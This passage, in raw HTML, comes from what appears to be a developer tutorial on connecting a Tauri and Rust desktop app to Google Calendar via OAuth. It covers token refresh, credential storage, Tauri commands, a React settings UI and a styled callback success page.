class="nn">Utc</span><span class="p">::</span><span class="nf">now</span><span class="p">()</span> <span class="o">+</span> <span class="nn">Duration</span><span class="p">::</span><span class="nf">seconds</span><span class="p">(</span><span class="n">token_data</span><span class="py">.expires_in</span><span class="p">);</span> <span class="c1">// Get user's email for display</span> <span class="k">let</span> <span class="n">email</span> <span class="o">=</span> <span class="nf">get_user_email</span><span class="p">(</span><span class="o">&amp;</span><span class="n">token_data</span><span class="py">.access_token</span><span class="p">)</span><span class="k">.await</span><span class="o">?</span><span class="p">;</span> <span class="nf">Ok</span><span class="p">(</span><span class="n">CalendarCredentials</span> <span class="p">{</span> <span class="n">email</span><span class="p">,</span> <span class="n">access_token</span><span class="p">:</span> <span class="n">token_data</span><span class="py">.access_token</span><span class="p">,</span> <span class="n">refresh_token</span><span class="p">,</span> <span class="n">token_expiry</span><span class="p">,</span> <span class="p">})</span> <span class="p">}</span> <span class="k">async</span> <span class="k">fn</span> <span class="nf">get_user_email</span><span class="p">(</span><span class="n">access_token</span><span class="p">:</span> <span class="o">&amp;</span><span class="nb">str</span><span class="p">)</span> <span class="k">-&gt;</span> <span class="nb">Result</span><span class="o">&lt;</span><span class="nb">String</span><span class="p">,</span> <span class="nb">String</span><span class="o">&gt;</span> <span class="p">{</span> <span class="k">let</span> <span class="n">client</span> <span class="o">=</span> <span class="nn">Client</span><span class="p">::</span><span class="nf">builder</span><span class="p">()</span> <span class="nf">.timeout</span><span class="p">(</span><span class="nn">std</span><span class="p">::</span><span class="nn">time</span><span class="p">::</span><span class="nn">Duration</span><span class="p">::</span><span class="nf">from_secs</span><span class="p">(</span><span class="mi">30</span><span class="p">))</span> <span class="nf">.build</span><span class="p">()</span> <span class="nf">.map_err</span><span class="p">(|</span><span class="n">e</span><span class="p">|</span> <span class="nd">format!</span><span class="p">(</span><span class="s">"Failed to build HTTP client: {}"</span><span class="p">,</span> <span class="n">e</span><span class="p">))</span><span class="o">?</span><span class="p">;</span> <span class="k">let</span> <span class="n">response</span> <span class="o">=</span> <span class="n">client</span> <span class="nf">.get</span><span class="p">(</span><span class="s">"https://www.googleapis.com/oauth2/v2/userinfo"</span><span class="p">)</span> <span class="nf">.bearer_auth</span><span class="p">(</span><span class="n">access_token</span><span class="p">)</span> <span class="nf">.send</span><span class="p">()</span> <span class="k">.await</span> <span class="nf">.map_err</span><span class="p">(|</span><span class="n">e</span><span class="p">|</span> <span class="nd">format!</span><span class="p">(</span><span class="s">"Failed to get user info: {}"</span><span class="p">,</span> <span class="n">e</span><span class="p">))</span><span class="o">?</span><span class="p">;</span> <span class="k">if</span> <span class="o">!</span><span class="n">response</span><span class="nf">.status</span><span class="p">()</span><span class="nf">.is_success</span><span class="p">()</span> <span class="p">{</span> <span class="k">return</span> <span class="nf">Err</span><span class="p">(</span><span class="nd">format!</span><span class="p">(</span><span class="s">"Failed to get user email: {}"</span><span class="p">,</span> <span class="n">response</span><span class="nf">.status</span><span class="p">()));</span> <span class="p">}</span> <span class="k">let</span> <span class="n">user_info</span><span class="p">:</span> <span class="n">UserInfo</span> <span class="o">=</span> <span class="n">response</span> <span class="nf">.json</span><span class="p">()</span> <span class="k">.await</span> <span class="nf">.map_err</span><span class="p">(|</span><span class="n">e</span><span class="p">|</span> <span class="nd">format!</span><span class="p">(</span><span class="s">"Failed to parse user info: {}"</span><span class="p">,</span> <span class="n">e</span><span class="p">))</span><span class="o">?</span><span class="p">;</span> <span class="nf">Ok</span><span class="p">(</span><span class="n">user_info</span><span class="py">.email</span><span class="p">)</span> <span class="p">}</span> </code></pre> </div> <p><strong>Why we need both tokens:</strong></p> <ul> <li> <strong>Access token</strong>: Short-lived (1 hour), used for API calls</li> <li> <strong>Refresh token</strong>: Long-lived (months/years), gets new access tokens</li> </ul> <p><strong>Getting the email:</strong><br><br> We call Google's userinfo endpoint to show users which account is connected. This helps when they have multiple Google accounts.</p> <h3> Step 5: Token Refresh </h3> <p>Access tokens expire every hour. Here's how to refresh them:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight rust"><code><span class="k">pub</span> <span class="k">async</span> <span class="k">fn</span> <span class="nf">refresh_access_token</span><span class="p">(</span><span class="n">refresh_token</span><span class="p">:</span> <span class="o">&amp;</span><span class="nb">str</span><span class="p">)</span> <span class="k">-&gt;</span> <span class="nb">Result</span><span class="o">&lt;</span><span class="p">(</span><span class="nb">String</span><span class="p">,</span> <span class="nb">i64</span><span class="p">),</span> <span class="nb">String</span><span class="o">&gt;</span> <span class="p">{</span> <span class="nd">println!</span><span class="p">(</span><span class="s">"Refreshing access token..."</span><span class="p">);</span> <span class="k">let</span> <span class="n">client</span> <span class="o">=</span> <span class="nn">Client</span><span class="p">::</span><span class="nf">builder</span><span class="p">()</span> <span class="nf">.timeout</span><span class="p">(</span><span class="nn">std</span><span class="p">::</span><span class="nn">time</span><span class="p">::</span><span class="nn">Duration</span><span class="p">::</span><span class="nf">from_secs</span><span class="p">(</span><span class="mi">30</span><span class="p">))</span> <span class="nf">.build</span><span class="p">()</span> <span class="nf">.map_err</span><span class="p">(|</span><span class="n">e</span><span class="p">|</span> <span class="nd">format!</span><span class="p">(</span><span class="s">"Failed to build HTTP client: {}"</span><span class="p">,</span> <span class="n">e</span><span class="p">))</span><span class="o">?</span><span class="p">;</span> <span class="k">let</span> <span class="n">params</span> <span class="o">=</span> <span class="p">[</span> <span class="p">(</span><span class="s">"client_id"</span><span class="p">,</span> <span class="n">CLIENT_ID</span><span class="p">),</span> <span class="p">(</span><span class="s">"client_secret"</span><span class="p">,</span> <span class="n">CLIENT_SECRET</span><span class="p">),</span> <span class="p">(</span><span class="s">"refresh_token"</span><span class="p">,</span> <span class="n">refresh_token</span><span class="p">),</span> <span class="p">(</span><span class="s">"grant_type"</span><span class="p">,</span> <span class="s">"refresh_token"</span><span class="p">),</span> <span class="p">];</span> <span class="k">let</span> <span class="n">response</span> <span class="o">=</span> <span class="n">client</span> <span class="nf">.post</span><span class="p">(</span><span class="n">GOOGLE_TOKEN_URL</span><span class="p">)</span> <span class="nf">.form</span><span class="p">(</span><span class="o">&amp;</span><span class="n">params</span><span class="p">)</span> <span class="nf">.send</span><span class="p">()</span> <span class="k">.await</span> <span class="nf">.map_err</span><span class="p">(|</span><span class="n">e</span><span class="p">|</span> <span class="nd">format!</span><span class="p">(</span><span class="s">"Failed to refresh token: {}"</span><span class="p">,</span> <span class="n">e</span><span class="p">))</span><span class="o">?</span><span class="p">;</span> <span class="k">if</span> <span class="o">!</span><span class="n">response</span><span class="nf">.status</span><span class="p">()</span><span class="nf">.is_success</span><span class="p">()</span> <span class="p">{</span> <span class="k">let</span> <span class="n">status</span> <span class="o">=</span> <span class="n">response</span><span class="nf">.status</span><span class="p">();</span> <span class="k">let</span> <span class="n">error_body</span> <span class="o">=</span> <span class="n">response</span><span class="nf">.text</span><span class="p">()</span><span class="k">.await</span><span class="nf">.unwrap_or_default</span><span class="p">();</span> <span class="k">return</span> <span class="nf">Err</span><span class="p">(</span><span class="nd">format!</span><span class="p">(</span><span class="s">"Token refresh failed: {} - {}"</span><span class="p">,</span> <span class="n">status</span><span class="p">,</span> <span class="n">error_body</span><span class="p">));</span> <span class="p">}</span> <span class="k">let</span> <span class="n">token_data</span><span class="p">:</span> <span class="n">TokenResponse</span> <span class="o">=</span> <span class="n">response</span> <span class="nf">.json</span><span class="p">()</span> <span class="k">.await</span> <span class="nf">.map_err</span><span class="p">(|</span><span class="n">e</span><span class="p">|</span> <span class="nd">format!</span><span class="p">(</span><span class="s">"Failed to parse refresh response: {}"</span><span class="p">,</span> <span class="n">e</span><span class="p">))</span><span class="o">?</span><span class="p">;</span> <span class="nd">println!</span><span class="p">(</span><span class="s">"Token refreshed successfully"</span><span class="p">);</span> <span class="nf">Ok</span><span class="p">((</span><span class="n">token_data</span><span class="py">.access_token</span><span class="p">,</span> <span class="n">token_data</span><span class="py">.expires_in</span><span class="p">))</span> <span class="p">}</span> </code></pre> </div> <p>This function returns a tuple <code>(new_access_token, expires_in_seconds)</code>. The caller saves the new token to the database and updates the expiry timestamp.</p> <p>This function returns a tuple <code>(new_access_token, expires_in_seconds)</code>. The caller saves the new token to the database and updates the expiry timestamp.</p> <h3> Step 6: Service Layer (Business Logic) </h3> <p>The service layer orchestrates OAuth flow and database operations:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight rust"><code><span class="c1">// src/services/calendar_service.rs</span> <span class="k">use</span> <span class="k">crate</span><span class="p">::</span><span class="nn">db</span><span class="p">::{</span><span class="k">self</span><span class="p">,</span> <span class="n">Database</span><span class="p">};</span> <span class="k">use</span> <span class="k">crate</span><span class="p">::</span><span class="nn">structs</span><span class="p">::</span><span class="nn">calendar</span><span class="p">::</span><span class="n">CalendarCredentials</span><span class="p">;</span> <span class="k">use</span> <span class="k">crate</span><span class="p">::</span><span class="nn">thirdparty</span><span class="p">::</span><span class="n">calendar</span><span class="p">;</span> <span class="k">use</span> <span class="nn">chrono</span><span class="p">::{</span><span class="n">DateTime</span><span class="p">,</span> <span class="n">Utc</span><span class="p">,</span> <span class="n">Duration</span><span class="p">};</span> <span class="k">pub</span> <span class="k">async</span> <span class="k">fn</span> <span class="nf">start_oauth_flow</span><span class="p">(</span><span class="n">db</span><span class="p">:</span> <span class="o">&amp;</span><span class="n">Database</span><span class="p">)</span> <span class="k">-&gt;</span> <span class="nb">Result</span><span class="o">&lt;</span><span class="n">CalendarCredentials</span><span class="p">,</span> <span class="nb">String</span><span class="o">&gt;</span> <span class="p">{</span> <span class="c1">// Start OAuth flow and get credentials</span> <span class="k">let</span> <span class="n">credentials</span> <span class="o">=</span> <span class="nn">calendar</span><span class="p">::</span><span class="nf">start_oauth_flow</span><span class="p">()</span><span class="k">.await</span><span class="o">?</span><span class="p">;</span> <span class="c1">// Save to database</span> <span class="nf">save_credentials</span><span class="p">(</span><span class="n">db</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">credentials</span><span class="p">)</span><span class="o">?</span><span class="p">;</span> <span class="nf">Ok</span><span class="p">(</span><span class="n">credentials</span><span class="p">)</span> <span class="p">}</span> <span class="k">pub</span> <span class="k">fn</span> <span class="nf">save_credentials</span><span class="p">(</span><span class="n">db</span><span class="p">:</span> <span class="o">&amp;</span><span class="n">Database</span><span class="p">,</span> <span class="n">creds</span><span class="p">:</span> <span class="o">&amp;</span><span class="n">CalendarCredentials</span><span class="p">)</span> <span class="k">-&gt;</span> <span class="nb">Result</span><span class="o">&lt;</span><span class="p">(),</span> <span class="nb">String</span><span class="o">&gt;</span> <span class="p">{</span> <span class="k">let</span> <span class="n">conn</span> <span class="o">=</span> <span class="n">db</span><span class="nf">.get_connection</span><span class="p">();</span> <span class="nn">db</span><span class="p">::</span><span class="nf">save_calendar_credentials</span><span class="p">(</span><span class="o">&amp;</span><span class="n">conn</span><span class="p">,</span> <span class="n">creds</span><span class="p">)</span> <span class="nf">.map_err</span><span class="p">(|</span><span class="n">e</span><span class="p">|</span> <span class="nd">format!</span><span class="p">(</span><span class="s">"Failed to save credentials: {}"</span><span class="p">,</span> <span class="n">e</span><span class="p">))</span> <span class="p">}</span> <span class="k">pub</span> <span class="k">fn</span> <span class="nf">get_credentials</span><span class="p">(</span><span class="n">db</span><span class="p">:</span> <span class="o">&amp;</span><span class="n">Database</span><span class="p">)</span> <span class="k">-&gt;</span> <span class="nb">Result</span><span class="o">&lt;</span><span class="nb">Option</span><span class="o">&lt;</span><span class="n">CalendarCredentials</span><span class="o">&gt;</span><span class="p">,</span> <span class="nb">String</span><span class="o">&gt;</span> <span class="p">{</span> <span class="k">let</span> <span class="n">conn</span> <span class="o">=</span> <span class="n">db</span><span class="nf">.get_connection</span><span class="p">();</span> <span class="nn">db</span><span class="p">::</span><span class="nf">get_calendar_credentials</span><span class="p">(</span><span class="o">&amp;</span><span class="n">conn</span><span class="p">)</span> <span class="nf">.map_err</span><span class="p">(|</span><span class="n">e</span><span class="p">|</span> <span class="nd">format!</span><span class="p">(</span><span class="s">"Failed to get credentials: {}"</span><span class="p">,</span> <span class="n">e</span><span class="p">))</span> <span class="p">}</span> <span class="k">pub</span> <span class="k">fn</span> <span class="nf">disconnect_calendar</span><span class="p">(</span><span class="n">db</span><span class="p">:</span> <span class="o">&amp;</span><span class="n">Database</span><span class="p">)</span> <span class="k">-&gt;</span> <span class="nb">Result</span><span class="o">&lt;</span><span class="p">(),</span> <span class="nb">String</span><span class="o">&gt;</span> <span class="p">{</span> <span class="k">let</span> <span class="n">conn</span> <span class="o">=</span> <span class="n">db</span><span class="nf">.get_connection</span><span class="p">();</span> <span class="nn">db</span><span class="p">::</span><span class="nf">clear_calendar_credentials</span><span class="p">(</span><span class="o">&amp;</span><span class="n">conn</span><span class="p">)</span> <span class="nf">.map_err</span><span class="p">(|</span><span class="n">e</span><span class="p">|</span> <span class="nd">format!</span><span class="p">(</span><span class="s">"Failed to disconnect calendar: {}"</span><span class="p">,</span> <span class="n">e</span><span class="p">))</span> <span class="p">}</span> <span class="c1">// Get valid access token, refreshing if needed</span> <span class="k">pub</span> <span class="k">async</span> <span class="k">fn</span> <span class="nf">get_valid_access_token</span><span class="p">(</span><span class="n">db</span><span class="p">:</span> <span class="o">&amp;</span><span class="n">Database</span><span class="p">)</span> <span class="k">-&gt;</span> <span class="nb">Result</span><span class="o">&lt;</span><span class="nb">String</span><span class="p">,</span> <span class="nb">String</span><span class="o">&gt;</span> <span class="p">{</span> <span class="k">let</span> <span class="k">mut</span> <span class="n">creds</span> <span class="o">=</span> <span class="nf">get_credentials</span><span class="p">(</span><span class="n">db</span><span class="p">)</span><span class="o">?</span> <span class="nf">.ok_or_else</span><span class="p">(||</span> <span class="s">"No calendar credentials found"</span><span class="nf">.to_string</span><span class="p">())</span><span class="o">?</span><span class="p">;</span> <span class="c1">// Check if token is expired (with 5-minute buffer)</span> <span class="k">let</span> <span class="n">now</span> <span class="o">=</span> <span class="nn">Utc</span><span class="p">::</span><span class="nf">now</span><span class="p">();</span> <span class="k">let</span> <span class="n">buffer</span> <span class="o">=</span> <span class="nn">Duration</span><span class="p">::</span><span class="nf">minutes</span><span class="p">(</span><span class="mi">5</span><span class="p">);</span> <span class="k">if</span> <span class="n">now</span> <span class="o">+</span> <span class="n">buffer</span> <span class="o">&gt;=</span> <span class="n">creds</span><span class="py">.token_expiry</span> <span class="p">{</span> <span class="nd">println!</span><span class="p">(</span><span class="s">"Access token expired, refreshing..."</span><span class="p">);</span> <span class="c1">// Refresh the token</span> <span class="k">let</span> <span class="p">(</span><span class="n">new_access_token</span><span class="p">,</span> <span class="n">expires_in</span><span class="p">)</span> <span class="o">=</span> <span class="nn">calendar</span><span class="p">::</span><span class="nf">refresh_access_token</span><span class="p">(</span><span class="o">&amp;</span><span class="n">creds</span><span class="py">.refresh_token</span><span class="p">)</span><span class="k">.await</span><span class="o">?</span><span class="p">;</span> <span class="c1">// Update credentials</span> <span class="n">creds</span><span class="py">.access_token</span> <span class="o">=</span> <span class="n">new_access_token</span><span class="p">;</span> <span class="n">creds</span><span class="py">.token_expiry</span> <span class="o">=</span> <span class="n">now</span> <span class="o">+</span> <span class="nn">Duration</span><span class="p">::</span><span class="nf">seconds</span><span class="p">(</span><span class="n">expires_in</span><span class="p">);</span> <span class="c1">// Save to database</span> <span class="nf">save_credentials</span><span class="p">(</span><span class="n">db</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">creds</span><span class="p">)</span><span class="o">?</span><span class="p">;</span> <span class="p">}</span> <span class="nf">Ok</span><span class="p">(</span><span class="n">creds</span><span class="py">.access_token</span><span class="p">)</span> <span class="p">}</span> </code></pre> </div> <p><strong>The <code>get_valid_access_token</code> function is clever:</strong></p> <ol> <li>Checks if token expires in next 5 minutes</li> <li>If expiring soon → Refreshes automatically</li> <li>Saves new token to database</li> <li>Returns valid token</li> </ol> <p>This means other parts of the app can just call this function and always get a working token. No need to handle expiry everywhere.</p> <h3> Step 7: Tauri Commands (Frontend Bridge) </h3> <p>Expose Rust functions to JavaScript:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight rust"><code><span class="c1">// src/commands/calendar_commands.rs</span> <span class="k">use</span> <span class="nn">tauri</span><span class="p">::</span><span class="n">State</span><span class="p">;</span> <span class="k">use</span> <span class="k">crate</span><span class="p">::</span><span class="n">db</span><span class="p">;</span> <span class="k">use</span> <span class="k">crate</span><span class="p">::</span><span class="nn">services</span><span class="p">::</span><span class="n">calendar_service</span><span class="p">;</span> <span class="k">use</span> <span class="k">crate</span><span class="p">::</span><span class="nn">structs</span><span class="p">::</span><span class="nn">calendar</span><span class="p">::</span><span class="n">CalendarCredentials</span><span class="p">;</span> <span class="nd">#[tauri::command]</span> <span class="k">pub</span> <span class="k">async</span> <span class="k">fn</span> <span class="nf">start_calendar_auth</span><span class="p">(</span><span class="n">db</span><span class="p">:</span> <span class="n">State</span><span class="o">&lt;</span><span class="nv">'_</span><span class="p">,</span> <span class="nn">db</span><span class="p">::</span><span class="n">Database</span><span class="o">&gt;</span><span class="p">)</span> <span class="k">-&gt;</span> <span class="nb">Result</span><span class="o">&lt;</span><span class="n">CalendarCredentials</span><span class="p">,</span> <span class="nb">String</span><span class="o">&gt;</span> <span class="p">{</span> <span class="nn">calendar_service</span><span class="p">::</span><span class="nf">start_oauth_flow</span><span class="p">(</span><span class="o">&amp;</span><span class="n">db</span><span class="p">)</span><span class="k">.await</span> <span class="p">}</span> <span class="nd">#[tauri::command]</span> <span class="k">pub</span> <span class="k">fn</span> <span class="nf">get_calendar_status</span><span class="p">(</span><span class="n">db</span><span class="p">:</span> <span class="n">State</span><span class="o">&lt;</span><span class="nv">'_</span><span class="p">,</span> <span class="nn">db</span><span class="p">::</span><span class="n">Database</span><span class="o">&gt;</span><span class="p">)</span> <span class="k">-&gt;</span> <span class="nb">Result</span><span class="o">&lt;</span><span class="nb">Option</span><span class="o">&lt;</span><span class="n">CalendarCredentials</span><span class="o">&gt;</span><span class="p">,</span> <span class="nb">String</span><span class="o">&gt;</span> <span class="p">{</span> <span class="nn">calendar_service</span><span class="p">::</span><span class="nf">get_credentials</span><span class="p">(</span><span class="o">&amp;</span><span class="n">db</span><span class="p">)</span> <span class="p">}</span> <span class="nd">#[tauri::command]</span> <span class="k">pub</span> <span class="k">fn</span> <span class="nf">disconnect_calendar</span><span class="p">(</span><span class="n">db</span><span class="p">:</span> <span class="n">State</span><span class="o">&lt;</span><span class="nv">'_</span><span class="p">,</span> <span class="nn">db</span><span class="p">::</span><span class="n">Database</span><span class="o">&gt;</span><span class="p">)</span> <span class="k">-&gt;</span> <span class="nb">Result</span><span class="o">&lt;</span><span class="p">(),</span> <span class="nb">String</span><span class="o">&gt;</span> <span class="p">{</span> <span class="nn">calendar_service</span><span class="p">::</span><span class="nf">disconnect_calendar</span><span class="p">(</span><span class="o">&amp;</span><span class="n">db</span><span class="p">)</span> <span class="p">}</span> </code></pre> </div> <p><strong>These commands are thin wrappers</strong> - they just bridge JavaScript to Rust. All the real logic is in the service layer.</p> <p>Don't forget to register them in <code>main.rs</code>:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight rust"><code><span class="k">fn</span> <span class="nf">main</span><span class="p">()</span> <span class="p">{</span> <span class="nn">tauri</span><span class="p">::</span><span class="nn">Builder</span><span class="p">::</span><span class="nf">default</span><span class="p">()</span> <span class="nf">.invoke_handler</span><span class="p">(</span><span class="nn">tauri</span><span class="p">::</span><span class="nd">generate_handler!</span><span class="p">[</span> <span class="n">start_calendar_auth</span><span class="p">,</span> <span class="n">get_calendar_status</span><span class="p">,</span> <span class="n">disconnect_calendar</span><span class="p">,</span> <span class="p">])</span> <span class="nf">.run</span><span class="p">(</span><span class="nn">tauri</span><span class="p">::</span><span class="nd">generate_context!</span><span class="p">())</span> <span class="nf">.expect</span><span class="p">(</span><span class="s">"error while running tauri application"</span><span class="p">);</span> <span class="p">}</span> </code></pre> </div> <h3> Step 8: Frontend Integration (React/TypeScript) </h3> <p>Finally, the UI layer:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight typescript"><code><span class="c1">// In your Tauri commands wrapper</span> <span class="k">import</span> <span class="p">{</span> <span class="nx">invoke</span> <span class="p">}</span> <span class="k">from</span> <span class="dl">'</span><span class="s1">@tauri-apps/api/core</span><span class="dl">'</span><span class="p">;</span> <span class="k">export</span> <span class="kd">const</span> <span class="nx">tauriCommands</span> <span class="o">=</span> <span class="p">{</span> <span class="na">startCalendarAuth</span><span class="p">:</span> <span class="k">async </span><span class="p">():</span> <span class="nb">Promise</span><span class="o">&lt;</span><span class="nx">CalendarCredentials</span><span class="o">&gt;</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="k">return</span> <span class="k">await</span> <span class="nx">invoke</span><span class="o">&lt;</span><span class="nx">CalendarCredentials</span><span class="o">&gt;</span><span class="p">(</span><span class="dl">'</span><span class="s1">start_calendar_auth</span><span class="dl">'</span><span class="p">);</span> <span class="p">},</span> <span class="na">getCalendarStatus</span><span class="p">:</span> <span class="k">async </span><span class="p">():</span> <span class="nb">Promise</span><span class="o">&lt;</span><span class="nx">CalendarCredentials</span> <span class="o">|</span> <span class="kc">null</span><span class="o">&gt;</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="k">return</span> <span class="k">await</span> <span class="nx">invoke</span><span class="o">&lt;</span><span class="nx">CalendarCredentials</span> <span class="o">|</span> <span class="kc">null</span><span class="o">&gt;</span><span class="p">(</span><span class="dl">'</span><span class="s1">get_calendar_status</span><span class="dl">'</span><span class="p">);</span> <span class="p">},</span> <span class="na">disconnectCalendar</span><span class="p">:</span> <span class="k">async </span><span class="p">():</span> <span class="nb">Promise</span><span class="o">&lt;</span><span class="k">void</span><span class="o">&gt;</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="k">await</span> <span class="nf">invoke</span><span class="p">(</span><span class="dl">'</span><span class="s1">disconnect_calendar</span><span class="dl">'</span><span class="p">);</span> <span class="p">},</span> <span class="p">};</span> </code></pre> </div> <p>And in your React component:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight tsx"><code><span class="c1">// src/pages/SettingsPage.tsx</span> <span class="kd">const</span> <span class="p">[</span><span class="nx">settings</span><span class="p">,</span> <span class="nx">setSettings</span><span class="p">]</span> <span class="o">=</span> <span class="nx">useState</span><span class="o">&lt;</span><span class="nx">Settings</span> <span class="o">|</span> <span class="kc">null</span><span class="o">&gt;</span><span class="p">(</span><span class="kc">null</span><span class="p">);</span> <span class="kd">const</span> <span class="p">[</span><span class="nx">connecting</span><span class="p">,</span> <span class="nx">setConnecting</span><span class="p">]</span> <span class="o">=</span> <span class="nf">useState</span><span class="p">(</span><span class="kc">false</span><span class="p">);</span> <span class="kd">const</span> <span class="nx">startCalendarConnection</span> <span class="o">=</span> <span class="k">async </span><span class="p">()</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="nf">setConnecting</span><span class="p">(</span><span class="kc">true</span><span class="p">);</span> <span class="k">try</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">credentials</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">tauriCommands</span><span class="p">.</span><span class="nf">startCalendarAuth</span><span class="p">();</span> <span class="nx">console</span><span class="p">.</span><span class="nf">log</span><span class="p">(</span><span class="dl">'</span><span class="s1">Calendar connected:</span><span class="dl">'</span><span class="p">,</span> <span class="nx">credentials</span><span class="p">);</span> <span class="c1">// Refresh settings to show connected status</span> <span class="kd">const</span> <span class="nx">updatedSettings</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">tauriCommands</span><span class="p">.</span><span class="nf">getSettings</span><span class="p">();</span> <span class="nf">setSettings</span><span class="p">(</span><span class="nx">updatedSettings</span><span class="p">);</span> <span class="p">}</span> <span class="k">catch </span><span class="p">(</span><span class="nx">error</span><span class="p">)</span> <span class="p">{</span> <span class="nx">console</span><span class="p">.</span><span class="nf">error</span><span class="p">(</span><span class="dl">'</span><span class="s1">Failed to start calendar auth:</span><span class="dl">'</span><span class="p">,</span> <span class="nx">error</span><span class="p">);</span> <span class="p">}</span> <span class="k">finally</span> <span class="p">{</span> <span class="nf">setConnecting</span><span class="p">(</span><span class="kc">false</span><span class="p">);</span> <span class="p">}</span> <span class="p">};</span> <span class="kd">const</span> <span class="nx">disconnectCalendar</span> <span class="o">=</span> <span class="k">async </span><span class="p">()</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="k">try</span> <span class="p">{</span> <span class="k">await</span> <span class="nx">tauriCommands</span><span class="p">.</span><span class="nf">disconnectCalendar</span><span class="p">();</span> <span class="kd">const</span> <span class="nx">updatedSettings</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">tauriCommands</span><span class="p">.</span><span class="nf">getSettings</span><span class="p">();</span> <span class="nf">setSettings</span><span class="p">(</span><span class="nx">updatedSettings</span><span class="p">);</span> <span class="p">}</span> <span class="k">catch </span><span class="p">(</span><span class="nx">error</span><span class="p">)</span> <span class="p">{</span> <span class="nx">console</span><span class="p">.</span><span class="nf">error</span><span class="p">(</span><span class="dl">'</span><span class="s1">Failed to disconnect calendar:</span><span class="dl">'</span><span class="p">,</span> <span class="nx">error</span><span class="p">);</span> <span class="p">}</span> <span class="p">};</span> <span class="c1">// In your JSX:</span> <span class="p">{</span><span class="nx">settings</span><span class="p">.</span><span class="nx">calendarIntegrationEnabled</span> <span class="p">?</span> <span class="p">(</span> <span class="p">&lt;</span><span class="nt">div</span><span class="p">&gt;</span> <span class="p">&lt;</span><span class="nc">Label</span><span class="p">&gt;</span>Connected: <span class="si">{</span><span class="nx">settings</span><span class="p">.</span><span class="nx">calendarEmail</span><span class="si">}</span><span class="p">&lt;/</span><span class="nc">Label</span><span class="p">&gt;</span> <span class="p">&lt;</span><span class="nc">Button</span> <span class="na">onClick</span><span class="p">=</span><span class="si">{</span><span class="nx">disconnectCalendar</span><span class="si">}</span><span class="p">&gt;</span>Disconnect<span class="p">&lt;/</span><span class="nc">Button</span><span class="p">&gt;</span> <span class="p">&lt;/</span><span class="nt">div</span><span class="p">&gt;</span> <span class="p">)</span> <span class="p">:</span> <span class="p">(</span> <span class="p">&lt;</span><span class="nc">Button</span> <span class="na">onClick</span><span class="p">=</span><span class="si">{</span><span class="nx">startCalendarConnection</span><span class="si">}</span> <span class="na">disabled</span><span class="p">=</span><span class="si">{</span><span class="nx">connecting</span><span class="si">}</span><span class="p">&gt;</span> <span class="si">{</span><span class="nx">connecting</span> <span class="p">?</span> <span class="dl">'</span><span class="s1">Connecting...</span><span class="dl">'</span> <span class="p">:</span> <span class="dl">'</span><span class="s1">Connect Calendar</span><span class="dl">'</span><span class="si">}</span> <span class="p">&lt;/</span><span class="nc">Button</span><span class="p">&gt;</span> <span class="p">)}</span> </code></pre> </div> <p><strong>User experience:</strong></p> <ol> <li>User clicks "Connect Calendar"</li> <li>Browser opens to Google (automatic)</li> <li>User authorizes</li> <li>Success page shows in browser</li> <li>User closes browser tab</li> <li>App shows "Connected: <a href="mailto:user@gmail.com">user@gmail.com</a>"</li> </ol> <p>Total time: ~10 seconds.</p> <h3> Step 9: OAuth Callback HTML Pages </h3> <p>When OAuth completes, the user needs feedback. I created three HTML pages that display in the browser:</p> <p><strong>Success Page</strong> (<code>src/oauth_pages/success.html</code>) - Shows when authorization succeeds:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="cp">&lt;!DOCTYPE html&gt;</span> <span class="nt">&lt;html&gt;</span> <span class="nt">&lt;head&gt;</span> <span class="nt">&lt;title&gt;</span>Authorization Successful<span class="nt">&lt;/title&gt;</span> <span class="nt">&lt;style&gt;</span> <span class="nt">body</span> <span class="p">{</span> <span class="nl">font-family</span><span class="p">:</span> <span class="n">-apple-system</span><span class="p">,</span> <span class="n">BlinkMacSystemFont</span><span class="p">,</span> <span class="nb">sans-serif</span><span class="p">;</span> <span class="nl">display</span><span class="p">:</span> <span class="n">flex</span><span class="p">;</span> <span class="nl">justify-content</span><span class="p">:</span> <span class="nb">center</span><span class="p">;</span> <span class="nl">align-items</span><span class="p">:</span> <span class="nb">center</span><span class="p">;</span> <span class="nl">min-height</span><span class="p">:</span> <span class="m">100vh</span><span class="p">;</span> <span class="nl">background</span><span class="p">:</span> <span class="n">hsl</span><span class="p">(</span><span class="m">40</span><span class="p">,</span> <span class="m">20%</span><span class="p">,</span> <span class="m">98%</span><span class="p">);</span> <span class="p">}</span> <span class="nc">.container</span> <span class="p">{</span> <span class="nl">background</span><span class="p">:</span> <span class="no">white</span><span class="p">;</span> <span class="nl">padding</span><span class="p">:</span> <span class="m">48px</span><span class="p">;</span> <span class="nl">border-radius</span><span class="p">:</span> <span class="m">16px</span><span class="p">;</span> <span class="nl">box-shadow</span><span class="p">:</span> <span class="m">0</span> <span class="m">4px</span> <span class="m">20px</span> <span class="n">rgba</span><span class="p">(</span><span class="m">0</span><span class="p">,</span><span class="m">0</span><span class="p">,</span><span class="m">0</span><span class="p">,</span><span class="m">0.08</span><span class="p">);</span> <span class="nl">text-align</span><span class="p">:</span> <span class="nb">center</span><span class="p">;</span> <span class="p">}</span> <span class="nc">.icon</span> <span class="p">{</span> <span class="nl">width</span><span class="p">:</span> <span class="m">64px</span><span class="p">;</span> <span class="nl">height</span><span class="p">:</span> <span class="m">64px</span><span class="p">;</span> <span class="nl">margin</span><span class="p">:</span> <span class="m">0</span> <span class="nb">auto</span> <span class="m">24px</span><span class="p">;</span> <span class="nl">background</span><span class="p">:</span> <span class="n">hsl</span><span class="p">(</span><span class="m">175</span><span class="p">,</span> <span class="m">40%</span><span class="p">,</span> <span class="m">94%</span><span class="p">);</span> <span class="nl">border-radius</span><span class="p">:</span> <span class="m">50%</span><span class="p">;</span> <span class="p">}</span> <span class="nt">&lt;/style&gt;</span> <span 